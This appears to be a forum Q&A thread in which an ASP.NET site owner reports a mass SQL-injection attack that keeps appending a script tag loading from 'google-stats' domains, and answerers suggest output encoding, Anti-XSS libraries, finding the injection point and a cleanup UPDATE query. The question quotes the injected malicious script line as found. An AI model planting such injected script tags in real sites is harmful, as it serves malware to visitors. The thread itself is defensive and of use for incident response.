5
votes

I am in very big trouble. Please help!!!!!!!!!!

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

Please help.

Thanks in advance!!!!!!

5 Answers

4
votes

When you render the text from the database you can use two ways to avoid this script.

  1. Use Server.HtmlEncode(DataFromDatabase);
  2. Use the Microsoft Anti-Cross dll library that has a similar function with more options.

The latest MS Anti-XSS library is now 3.1.
How to using video

How they pass this script.

  1. On the contact or other forms.
  2. On the browser reference on the statistics and when they browse your site, you keep a log about this and when you go to see this log the script is running.

Hope this helps.

2
votes

Shut down the site. Your server may or may not be screwed now.

You have to find out where the changes are coming from - Database or File system

If it's the DB then you may be ok, someone is probably using sql injection. Set permissions so that the DB cannot be updated by the site for now until you find the SQL INJECTION point.

If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.

0
votes

I would recommend that you remove all external host header bindings in IIS. That allows you to locate the problem locally without any of your clients being infected or stolen from.

0
votes

A Quick remedy

The following is not a solution, but with this you can remove the script from the database in a single query. That's what I do for now :).


UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'http://google-stats49.info/ur.php>', ' ')


This one works like the find and replace stuff in Word. If you find any whereabouts of the virus script, do post it here.

Regards, Masood

0
votes

Same problem here... it started about 15.30 and infected 4 tables... here is a solution for a full database search: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html just edit it to return distinct table names.

And this will work, as Masood mentioned:

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')